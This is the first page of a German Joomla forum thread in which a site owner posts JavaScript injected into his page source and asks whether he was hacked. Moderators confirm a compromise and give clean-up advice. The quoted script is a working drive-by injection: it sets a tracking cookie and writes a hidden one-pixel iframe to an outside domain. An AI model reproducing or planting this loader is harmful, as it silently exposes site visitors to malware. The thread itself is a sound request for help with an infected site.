+ Antworten
Seite 1 von 4 1 2 3 4 LetzteLetzte
Ergebnis 1 bis 10 von 32

Thema: Iframe Hausauto - Ist das ein Hack?

  1. #1
    Neu an Board
    Registriert seit
    06.11.2004
    Beiträge
    75
    Bedankte sich
    6
    1 Danksagung in 1 Beitrag

    Standard Iframe Hausauto - Ist das ein Hack?

    Meine Seite war kürzlich etwas zerschlagen.
    Das Template war nicht mehr einwandfrei. Ich habe mir erst gedacht, dass es mein Fehler war, da ich zuvor einige Plugins zur Komprimierung von CSS und JS installiert hatte.
    Dazwischen lag noch das Wochenende, sodass ich nicht mehr 100% rekonstruieren konnte was ich gemacht habe.

    Dann ist mir aufgefallen, dass ich am Anfang meines Quellcodes folgenden Code stehen habe:

    Code:
    <script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> </iframe>
    Mit der Domain hausauto.de konnte ich garnichts anfangen und war stutzig. Habe nach dem Iframe gegoogelt und festgestellt, dass es viele Seiten betrifft.
    Wurde meine Seite gehackt, oder hab ich mir das selber installiert?
    Weis zufällig jemand mit welcher Installation man sich diesen Code einfängt? Und kann jemand entziffern was es damit auf sich hat?

    mit freundlichen Grüßen
    Antti

  2. #2
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Ja definitv gehackt. Seite vom Netz nehmen und Analyse durchführen... (siehe Signatur).

  3. #3
    Neu an Board
    Registriert seit
    06.11.2004
    Beiträge
    75
    Bedankte sich
    6
    1 Danksagung in 1 Beitrag

    Standard

    Danke für die schnelle Antwort.
    Leider keine gute Nachricht...

    Lässt sich denn ungefähr sagen wie soetwas zustande kommt?

    Muss zugeben, dass ich beim Thema .htaccess etwas auf durchzug schalte. Finde es wenig intuitiv zu handhaben.
    Gibt es einen generellen Passwortschutz Code, den ich zur bestehenden .htacess Datei zufügen kann?

    Danke
    Antti

  4. #4
    Hat hier eine Zweitwohnung Avatar von Joe Sixpack
    Registriert seit
    28.03.2007
    Ort
    Schweizer Berge
    Beiträge
    1.704
    Bedankte sich
    250
    Erhielt 474 Danksagungen
    in 420 Beiträgen

    Standard

    Zitat Zitat von antti Beitrag anzeigen
    Lässt sich denn ungefähr sagen wie soetwas zustande kommt?
    veraltete Joomla-Version und / oder unsichere Erweiterungen? FTP-Zugang gehackt (Stichwort Trojaner auf deinem PC) und und und....

  5. #5
    Neu an Board
    Registriert seit
    06.11.2004
    Beiträge
    75
    Bedankte sich
    6
    1 Danksagung in 1 Beitrag

    Standard

    Ok war ne blöde Frage -

    Kann man denn sagen was dieser Hack verursacht bzw. bezwecken soll?

  6. #6
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Wozu willst Du wissen was der Hack bezwecken soll - ist doch völlig uninteressant. Offensichtlich ist Dein Account gehackt und der jetzige Angreifer wird unter Garantie nicht alleine bleiben. Möglicherweise findest Du bald Phishingseiten oder KiPo auf dem Account - also sieh zu die Lücke zu finden und den Account zu bereinigen. Alles andere ist in dieser Situation drittgrangig.

  7. #7
    Neu an Board
    Registriert seit
    06.11.2004
    Beiträge
    75
    Bedankte sich
    6
    1 Danksagung in 1 Beitrag

    Standard

    Ich finde es schon interessant zu wissen was mit meiner Seite passieren kann.

    Sehr wahrscheinlich ist nur das Template befallen, da ich die Meldung nicht mehr habe nachdem ich es gelöscht und neu installiert habe.
    Habe die htaccess Einstellung von filgender Seite alle vorgenommen.
    http://www.joomla-security.de/dateie...tellungen.html

    Die Joomla Seite war vorher schon 1.5.25
    Superadmin PW geändert
    Alle bis auf einen FTP Account gelöscht
    FTP PW geändert

    Gibt es ein Tool zum checken?

  8. #8
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    * deinen Rechner zu Hause auf Schädlinge Prüfen
    * alle(!) installierten Erweiterungen auf Aktualität bzw. bekannte Sicherheitsprobleme prüfen
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

  9. #9
    Moderator Avatar von Orpheus2510
    Registriert seit
    17.10.2006
    Beiträge
    14.144
    Bedankte sich
    164
    Erhielt 3.392 Danksagungen
    in 3.062 Beiträgen

    Standard

    Zitat Zitat von antti Beitrag anzeigen
    Ich finde es schon interessant zu wissen was mit meiner Seite passieren kann.
    Du solltest dich lieber dafür interessieren, was mit dir passiert, wenn über deine Seite Schadcode verbreitet wird und kriminelle Machenschaften betrieben werden. Dafür darfst du nämlich juristisch haften und zahlen. Darum ist das erste und wichtigste bei einer solchen Sache, daß du die Seite komplett löscht und den FTP-Zugang änderst. Alles weitere steht in Flottes Liste. Ich würde mich nicht einfach darauf verlassen, daß "nur das Template befallen" ist.
    Gruß, Orpheus2510
    Kein Support per PN! | Tutorial Migration J1.5 --> J2.5 | Joomla braucht dich!

  10. #10
    Gehört zum Inventar Avatar von ronny7362
    Registriert seit
    04.10.2008
    Ort
    London
    Alter
    50
    Beiträge
    6.741
    Bedankte sich
    184
    Erhielt 2.077 Danksagungen
    in 1.913 Beiträgen

    Standard

    Zitat Zitat von Orpheus2510 Beitrag anzeigen
    Du solltest dich lieber dafür interessieren, was mit dir passiert, wenn über deine Seite Schadcode verbreitet wird und kriminelle Machenschaften betrieben werden. Dafür darfst du nämlich juristisch haften und zahlen.
    das blicken die meisten leider nicht, damit ist nicht zu spassen, ein kunde von mir hatte eine gehackte seite auf meinem server
    dank einer unsicheren erweiterung, es wurden pishing mails verschickt

    ich hatte die webseite dann gesperrt, der schaden wurde aber nur begrenzt, nach vielen telefonaten und mails, konnte
    ich die bank of india davon abbringen regressansprueche zu stellen

    also leute seit euch bewusst ihr lebt gefaehrlich, wenn die luecken nicht geschlossen werden

    gruss ronny

  11. Erhielt Danksagungen von:


+ Antworten
Seite 1 von 4 1 2 3 4 LetzteLetzte

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein